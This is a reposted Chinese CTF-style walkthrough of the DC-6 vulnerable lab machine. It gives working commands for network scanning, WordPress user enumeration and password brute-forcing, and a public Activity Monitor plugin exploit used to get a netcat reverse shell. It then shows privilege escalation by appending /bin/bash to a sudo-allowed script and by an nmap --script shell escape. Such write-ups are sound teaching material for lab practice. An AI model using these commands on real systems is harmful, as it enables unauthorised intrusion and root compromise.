0


DC系列靶场---DC 6靶场的渗透测试

信息收集

地址探测

使用arp-scan对目标主机IP地址做探测

arp-scan -l -I eth0

端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.133

-sS 使用NmapSYN扫描,秘密扫描(默认)

-sV 对服务版本检测

-T4 野蛮的扫描(常用)

-p- 扫描所有端口

-O 扫描服务器版本

http探测

通过扫描可以看到目标主机的web需要域名解析

Hosts文件优先级更高,写入格式 “IP地址 域名”

cat /etc/hosts

现在可以直接通过域名访问了

这里我们使用插件看到这是WordPress的CMS,wpscan准门针对WordPress开发的

用户枚举

使用wpscan扫描和用户枚举

wpscan --url http://wordy -e u

扫描后可以看四个用户:admin、graham、mark、sarah、jens

暴力破解

Wpscan爆破

官网是由题目的,想要爆破速度快,可以先过滤这个字典文件

cat /usr/share/wordlists/rockyou.txt | grep k01 >> passwd.txt

wpscan --url http://wordy -U user.txt -P pass.txt

爆破结果:

Username: mark, Password: helpdesk01

漏洞探测及利用

登录后台

登录到管理后台,通过wp-scan扫描得到的登录地址为wp-admin

也就是http://wordy/wp-admin/

扫描插件

Wpscan对目标主机进行插件版本扫描--plugins-version detection

wpscan --plugins-version detection --url http://wordy

这个插件最新版本是20180826,目标主机使用的是20161228版本

漏洞搜索

使用searchsploit对插件进行漏洞搜索

searchsploit activity monitor

下面这两个都需要得到认证才可以利用,我们已经拿到认证了,就是网站的后台。

将html镜像到本地主机

searchsploit -m 45274.html

编辑文件

注意:原文件中的8000端口要删除,不然会自动转到8000转口。

     原文件中nc -nlvp 要改成 nc -nv

根据nc得端口开启侦听

nc -lnvp 9999

修改完成后我们放到本地主机得web中。然后开启apacha2服务器。

cp 45274.html /var/www/html

systemctl start apache2

直接访问本机web服务器,例:172.30.1.20/45274.html

点击按钮提交

在我们侦听得端口就看到这里已经拿到目标主机的shell权限了

提权

信息收集

查看系统的账户文件

cat /etc/passwd

发现这里有四个用户

ls

cd mark

ls

cd stuff

ls

cat things-to-do.txt

Graham用户

Mark家目录下有个文本文件,内容就是有个用户graham账户文件中是有这个用户的,后面的很可能就是这个用户的密码。

su - graham

现在已经登录成功

sudo -l

使用graham用户查看sudo的使用权限,看到jens用户可以不用输入密码执行backups.sh脚本。但是我现在是graham用户。

jens用户

这里是一个脚本文件,如果这是一个命令就不好办了。

尝试在脚本中添加一个shell,这和任务计划提权是差不多的。

方法很简单直接追加或者写入

echo "/bin/bash" >> /home/jens/backups.sh

指定jens用户运行该脚本

sudo -u jens /home/jens/backups.sh

这样就拿到了jens用户的shell

看到jens用户有Nmap的sudo授权

sudo -l

Nmap是可以通过sudo进行提权的,直接复制命令

(b)是要求版本的 (a)这个是可以直接使用的

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

直接切换到root的家目录,查看flag

cd /root

cat theflag.txt

成功拿到flag。

总结:

1、wpscan可以对wordpress网站进行用户枚举

2、枚举用户后根据用户制作一个字典,使用wpscan进行暴力破解

3、wpscan也可以对网站的插件进行版本检测,是否过时。

4、在进行提权之前一定要进行信息收集,信息收集很重要。

5、信息收集的时候一定要注意用户家目录的文本文件,这里面很容易出现密码

6、在从graham用户切换到jens用户时查看sudo权限的时候要注意脚本文件,脚本是直接可以进行提权的。

7、每次切换用户都要进行信息收集,所以说信息收集很重要。尤其是sudo、SUID如果不知道怎么提权可以去搜索


本文转载自: https://blog.csdn.net/zhouA0221/article/details/140965675
版权归原作者 白帽子二三 所有, 如有侵权,请联系我们删除。

“DC系列靶场---DC 6靶场的渗透测试”的评论:

还没有评论